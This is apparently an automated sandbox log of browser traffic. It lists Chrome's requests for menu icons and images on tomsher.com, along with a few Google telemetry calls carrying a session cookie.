Source: global trafficHTTP traffic detected: GET /assets/images/menu/content.png HTTP/1.1Host: www.tomsher.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.tomsher.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/images/menu/terms-and-conditions.png HTTP/1.1Host: www.tomsher.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/images/menu/blogger.png HTTP/1.1Host: www.tomsher.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/images/menu/dictionary.png HTTP/1.1Host: www.tomsher.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.tomsher.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/images/menu/google_api.png HTTP/1.1Host: www.tomsher.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.tomsher.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/images/menu/shopify.png HTTP/1.1Host: www.tomsher.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.tomsher.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/images/menu/woocommerce.png HTTP/1.1Host: www.tomsher.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/images/menu/Optimizely.png HTTP/1.1Host: www.tomsher.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/images/menu/zoho.png HTTP/1.1Host: www.tomsher.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /log?format=json&hasfast=true&authuser=0 HTTP/1.1Host: play.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQi5ys0BGPbJzQE=Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: NID=517=ylu3SfIdsVLC_CHJuNK6_egYjIZZxUDFJ_cj1fT_2BK-RHIkQMCDF3SxlhTWanGSvI-ortHlt71N1ulTaErrJpJMlpAvjXGGiOjIWOV5dBabNo6yHeraOvwQrYHrXF9zX11rdAVXQUu84TjdSC40o0yHl5-pR7W7r68n0V8OnPW4GDi2GjED2FnwMP0
Source: global trafficHTTP traffic detected: GET /assets/images/menu/oil-barrel.png HTTP/1.1Host: www.tomsher.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.tomsher.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/images/menu/accessability.png HTTP/1.1Host: www.tomsher.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.tomsher.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/images/menu/smo-seo.png HTTP/1.1Host: www.tomsher.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/images/menu/logo.png HTTP/1.1Host: www.tomsher.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.tomsher.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/images/menu/ssl.png HTTP/1.1Host: www.tomsher.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/images/menu/web-maintenance.png HTTP/1.1Host: www.tomsher.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.tomsher.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/images/menu/web_3.0.png HTTP/1.1Host: www.tomsher.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/images/menu/noon.png HTTP/1.1Host: www.tomsher.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.tomsher.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/images/menu/clients.png HTTP/1.1Host: www.tomsher.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.tomsher.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/images/menu/smm.png HTTP/1.1Host: www.tomsher.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/images/menu/stethoscope.png HTTP/1.1Host: www.tomsher.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/images/menu/amazon.png HTTP/1.1Host: www.tomsher.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/imgs/rlod.png HTTP/1.1Host: www.tomsher.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.tomsher.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/images/menu/android.png HTTP/1.1Host: www.tomsher.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/imgs/header/srv2.png HTTP/1.1Host: www.tomsher.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.tomsher.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/images/menu/hybrid.png HTTP/1.1Host: www.tomsher.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.tomsher.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/images/menu/google-workspace.png HTTP/1.1Host: www.tomsher.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.tomsher.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /log?format=json&hasfast=true&authuser=0 HTTP/1.1Host: play.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQi5ys0BGPbJzQE=Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: NID=517=ylu3SfIdsVLC_CHJuNK6_egYjIZZxUDFJ_cj1fT_2BK-RHIkQMCDF3SxlhTWanGSvI-ortHlt71N1ulTaErrJpJMlpAvjXGGiOjIWOV5dBabNo6yHeraOvwQrYHrXF9zX11rdAVXQUu84TjdSC40o0yHl5-pR7W7r68n0V8OnPW4GDi2GjED2FnwMP0
Source: global trafficHTTP traffic detected: GET /assets/images/menu/faq.png HTTP/1.1Host: www.tomsher.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/images/menu/youtube.png HTTP/1.1Host: www.tomsher.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.tomsher.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/images/menu/travel.png HTTP/1.1Host: www.tomsher.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/images/menu/prestashop.png HTTP/1.1Host: www.tomsher.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.tomsher.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/images/menu/portfolio.png HTTP/1.1Host: www.tomsher.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/images/menu/e-seo.png HTTP/1.1Host: www.tomsher.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/images/menu/m-365.png HTTP/1.1Host: www.tomsher.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/images/menu/privacy.png HTTP/1.1Host: www.tomsher.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.tomsher.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/imgs/12-years.jpg HTTP/1.1Host: www.tomsher.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.tomsher.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/imgs/hero/4/Group%209.svg HTTP/1.1Host: www.tomsher.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.tomsher.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/imgs/hero/4/Group%208.svg HTTP/1.1Host: www.tomsher.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.tomsher.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/images/menu/seo.png HTTP/1.1Host: www.tomsher.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /log?format=json&hasfast=true&authuser=0 HTTP/1.1Host: play.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQi5ys0BGPbJzQE=Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: NID=517=ylu3SfIdsVLC_CHJuNK6_egYjIZZxUDFJ_cj1fT_2BK-RHIkQMCDF3SxlhTWanGSvI-ortHlt71N1ulTaErrJpJMlpAvjXGGiOjIWOV5dBabNo6yHeraOvwQrYHrXF9zX11rdAVXQUu84TjdSC40o0yHl5-pR7W7r68n0V8OnPW4GDi2GjED2FnwMP0
Source: global trafficHTTP traffic detected: GET /assets/images/menu/erp.png HTTP/1.1Host: www.tomsher.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/imgs/mainbannne.png HTTP/1.1Host: www.tomsher.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.tomsher.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/images/menu/content.png HTTP/1.1Host: www.tomsher.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/imgs/hero/4/Group%207.svg HTTP/1.1Host: www.tomsher.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.tomsher.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/images/menu/dictionary.png HTTP/1.1Host: www.tomsher.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/images/menu/cloud.png HTTP/1.1Host: www.tomsher.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/images/menu/google_api.png HTTP/1.1Host: www.tomsher.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/imgs/hero/4/Group%203.svg HTTP/1.1Host: www.tomsher.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.tomsher.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
